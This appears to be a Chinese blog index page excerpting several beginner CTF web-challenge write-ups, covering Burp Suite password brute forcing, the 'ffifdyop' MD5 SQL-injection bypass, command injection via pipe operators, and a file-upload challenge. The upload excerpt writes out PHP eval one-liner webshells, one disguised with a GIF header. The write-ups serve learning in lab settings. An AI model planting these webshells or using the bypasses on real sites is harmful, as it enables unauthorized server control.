weixin_54957456的博客

蛮简单的一道密码爆破题，就是有一点点小坑。弱密码top1000应该就是要你去网上找top1000的字典，z?????应该就是z开头的一个密码（事实证明的确如此）密码上传点抓包设置payload后导入下载好的top1000，开始爆破发现所有返回长度都一样，分析返回包，发现所有错误返回包都有如图下字段，截取以下字段，在option 中的grep-match中加入。重新爆破，不观察返回长度而是截取字段那一项发现成功密码。...

一道看似难其实不的题。然而我却琢磨了挺久。上图：第一反应是SQL注入，尝试一下。SQL注入爆不出来， 但是在响应头看见了hint字样，可以用ffifdyop绕过。具体原理就是ffifdyop经过md5加密后就是276f722736c95d99e921722cf9ed621c。md5函数加密后会返回16进制字符串，就成了'or'66�]��!r,��b（没错这里就是乱码）也就是说select * from 'admin' where password=md5($pass,tr

又是一道菜刀题。这道题的难点在于一句话木马的变更。很多平常用的一句话木马在这道题就不能用了。打开题目页面如下：这道题的一句话木马如下：GIF89a? <script language="php">eval($_REQUEST[1])</script>而我们之前常用的一句话木马差不多是这个样子： <?php @eval($_POST['attack']);?>但是恰巧这道题对上传的文件进行了过滤，比如说过滤了 <?好了言.

于是我，摸鱼来了→_→这道题没什么难度没给连接，手动输入乍一看还以为是个广告植入（雾）看源码：看见一个神秘连接：secret.php，点进去URL前删掉 view-source: (顺带一提，这也是打开页面源码的一种方式，以前有道题死活打不开源码差点让我emo了)...

其实嘛，这篇wp主要写给自己看的，本人也是三天打鱼两天晒网的菜鸟，自己写wp才能验证真的学会了嘛。想要和我一起学习的朋友也拜托指出1我的不足啊！这道题CSDN和其他博客上已经有很多wp了，每道wp的解法都不尽相同，所以这里本人在学习了解法后还总结归纳了一下其他大佬们所用的一些解法。这道题是属于非常基础的命令执行题了，连空格和分号都没有过滤→_→。方法一：常用的管道符包括：|，||，&，&&，；其中： | ：按或位，直接执行管道符后的语句。...

萌新第一次写writeup，如有不足请大佬指正！本人也在学习中进步！首先是这么一个网页小游戏，有点意思一般来说这种题可以通过玩游戏直接得到flag（经验与直觉，今年蓝帽杯的第一道web题历历在目），但要是出题人头铁要你得分99999999999999分（那到不至于），这就真的不好办，毕竟没办法大力出奇迹。然后我们先试玩一下游戏。好吧其实分数并不重要，因为你玩过几次后就会发现就算是达到预定分数获取flag也并非你人力所能及。在提交分数页面用bp抓包或者按F12查看源代码。找